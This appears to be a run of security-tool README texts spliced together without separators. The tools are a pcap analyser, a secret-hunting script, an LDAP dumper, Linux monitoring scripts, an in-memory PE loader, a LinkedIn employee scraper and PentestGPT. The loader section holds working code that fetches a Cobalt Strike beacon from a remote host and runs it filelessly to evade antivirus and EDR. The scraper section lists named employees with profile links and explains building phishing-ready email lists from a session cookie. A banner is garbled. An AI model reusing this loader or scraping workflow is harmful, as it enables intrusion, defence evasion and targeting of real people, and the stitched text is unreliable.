With Wireshark or TCPdump, you can determine whether there is harmful activity on your network traffic that you have recorded on the network you monitor.
This Python script analyzes network traffic in a given .pcap file and attempts to detect the following suspicious network activities and attacks:
The script also tries to detect packages containing suspicious keywords (eg "password", "login", "admin", etc.). Detected suspicious activities and attacks are displayed to the user in the console.
The main functions are:
get_user_input()
: Gets the path of the .pcap file from the user.get_all_ip_addresses(capture)
: Returns a set containing all source and destination IP addresses.detect_*
functions: Used to detect specific attacks and suspicious activities.main()
: Performs the main operations of the script. First, it gets the path of the .pcap file from the user, and then analyzes the file to try to detect the specified attacks and suspicious activity.git clone https://github.com/alperenugurlu/Network_Assessment.git
pip3 install -r requirements.txt
python3 Network_Compromise_Assessment.py
Please enter the path to the .pcap or .pcapng file: /root/Desktop/TCP_RST_Attack.pcap
(Example)
Alperen Ugurlu
https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/
Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.
Gold Digger requires Python3.
virtualenv -p python3 .
source bin/activate
python dig.py --help
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]
optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output
Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json
file. Additionally, you can leverage an exclusion file called exclusions.json
for skipping files matching specific extensions. Provide the root folder as the --directory
flag.
An example structure could be:
~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/
You would provide the following command to parse all 3 account reports:
python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.
Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.
msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the lpap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will not resolve hostnames that are not accessible via eth0 currently.
Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.
Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.
These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.
The scripts are located in the directory scripts/
. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.
Each script has a configuration file in the scripts/config/
directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.
The scripts/lib/
directory contains code that is shared between different scripts.
Scripts using a monitor_
prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init
argument.
Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.
The shared configuration file scripts/config/config.py
contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/
directory. If no configuration file was found, a default setting is used and the results are printed out.
Finally, you can run all configured scripts by executing start_search.py
(which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.
If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:
Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).
Configure the scripts that you want to run using the configuration files in the scripts/config/
directory.
Execute start_search.py
with the --init
argument to initialize the scripts with the monitor_
prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.
Set up a cron job as root
user that executes start_search.py
(e.g., 0 * * * * root /opt/LSMS/start_search.py
to start the search hourly).
Name | Script |
---|---|
Monitoring cron files | monitor_cron.py |
Monitoring /etc/hosts file | monitor_hosts_file.py |
Monitoring /etc/ld.so.preload file | monitor_ld_preload.py |
Monitoring /etc/passwd file | monitor_passwd.py |
Monitoring modules | monitor_modules.py |
Monitoring SSH authorized_keys files | monitor_ssh_authorized_keys.py |
Monitoring systemd unit files | monitor_systemd_units.py |
Search executables in /dev/shm | search_dev_shm.py |
Search fileless programs (memfd_create) | search_memfd_create.py |
Search hidden ELF files | search_hidden_exe.py |
Search immutable files | search_immutable_files.py |
Search kernel thread impersonations | search_non_kthreads.py |
Search processes that were started by a now disconnected SSH session | search_ssh_leftover_processes.py |
Search running deleted programs | search_deleted_exe.py |
Test script to check if alerting works | test_alert.py |
Verify integrity of installed .deb packages | verify_deb_packages.py |
"Python memory module" AI generated pic - hotpot.ai
pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory
PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes.
The tool was originally thought to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory, however other use-cases are possible (IP protection, pyds in-memory loading, spinoffs for other stealthier techniques) so I decided to create a dedicated repo.
In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.
import urllib.request
import ctypes
import pythonmemorymodule
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf=result.read()
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()
Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.
Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.
Python 3 script to dump company employees from LinkedIn API๏ฌ
LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.
The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format
CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.
LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.
li_at
session cookie value e.g. via developer toolsli_at
or temporarily during runtime via the CLI flag --cookie
usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]
options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'
docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
# install dependencies
pip install -r requirements.txt
python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'
The script will return employee data as semi-colon separated values (like CSV):
โโโ โโโ โโโโ โ โโ โโโโโโโโโ โโโโโโโ โโโ โโโโ โ โโโโโโโ โ โโ โโโโ โโโโโ โโโโโโ โโโโโโ โโโโโโ
โโโโ โโโโ โโ โโ โ โโโโโ โโ โ โโโโ โโโโโโโ โโ โโ โ โโโโ โโโ โโ โโโโโโโโโโ& #9600; โโโโโโโ โโโโโ โ โโโ โ โโโ
โโโโ โโโโโโโ โโ โโโโโโโโโ โโโโ โโโ โโโโโโโโโ โโ โโโโโโ โโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโ โโโ โโโ โ
โโโโ โโโโโโโโ โโโโโโโโ โโ โโโ โ โโโโ โ&# 9617;โโโโโโโ โโโโโโโโโ โโโโ โโโโโโโ โโโ โโโโโโโ โโโโ โ โโโโโโโ
โโโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโ โโโโโโโโโโโ โโโโโโโโ โโโโ โโโโโโโโ โ โโโโโโโ& #9618;โโโโ โโโโ
โ โโโ โโโ โ โโ โ โ โ โโ โโโโ โโ โ โโโ โ โโ โ โโ โ โ โโโ โ โโโโ โ โ โ โโ โ โโโโโ โ โโโ โโ โโ โโ โโโโ
โ โ โ โ โ โโ โโ โ โโโ โโ โโ โ โ โ โ โ โ โ โโ โโ โ โโ โ โ โ โโโโ โ โ โ โ โโโ โ โ โ โ โโ โ โโ
โ โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ โ โ โ โ โ โโโ โ โ โ โ โโ โ โโ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ by LRVT
[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter
[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-
LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.
Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles
. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.
Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as saluations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.
A GPT-empowered penetration testing tool.
resources
where we use it to solve HackTheBox challenge TEMPLATED (web challenge).Before installation, we recommend you to take a look at this installation video if you want to use cookie setup.
requirements.txt
with pip install -r requirements.txt
config
. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py
. Inspect - Network
, find the connections to the ChatGPT session page.https://chat.openai.com/api/auth/session
and paste it into the cookie
field of config/chatgpt_config.py
. (You may use Inspect->Network, find session and copy the cookie
field in request_headers
to https://chat.openai.com/api/auth/session
)userAgent
with your user agent.chatgpt_config.py
.python3 test_connection.py
. You should see some sample conversation with ChatGPT. 1. You're connected with ChatGPT Plus cookie.
To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
## Test connection for OpenAI api (GPT-4)
2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
## Test connection for OpenAI api (GPT-3.5)
3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
https://chat.openai.com/backend-api/conversations
. Please submit an issue if you encounter any problem.python3 main.py --args
. --reasoning_model
is the reasoning model you want to use.--useAPI
is whether you want to use OpenAI API.test_connection.py
, which are: python3 main.py --reasoning_model=gpt-4
python3 main.py --reasoning_model=gpt-4 --useAPI
python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
help
: show the help message.next
: key in the test execution result and get the next step.more
: let PentestGPT to explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.todo
: show the todo list.discuss
: discuss with the PentestGPT.google
: search on Google. This function is still under development.quit
: exit the tool and save the output as log file (see the reporting section below).TAB
to autocomplete the commands.ENTER
to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.more
, users can execute more commands to investigate into a specific problem: help
: show the help message.brainstorm
: let PentestGPT brainstorm on the local task for all the possible solutions.discuss
: discuss with PentestGPT about this local task.google
: search on Google. This function is still under development.continue
: exit the subtask and continue the main testing session.logs
folder (if you quit with quit
command).python3 utils/report_generator.py <log file>
. A sample report sample_pentestGPT_log.txt
is also uploaded.Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)Distributed under the MIT License. See LICENSE.txt
for more information.
Gelei Deng - gelei.deng@ntu.edu.sg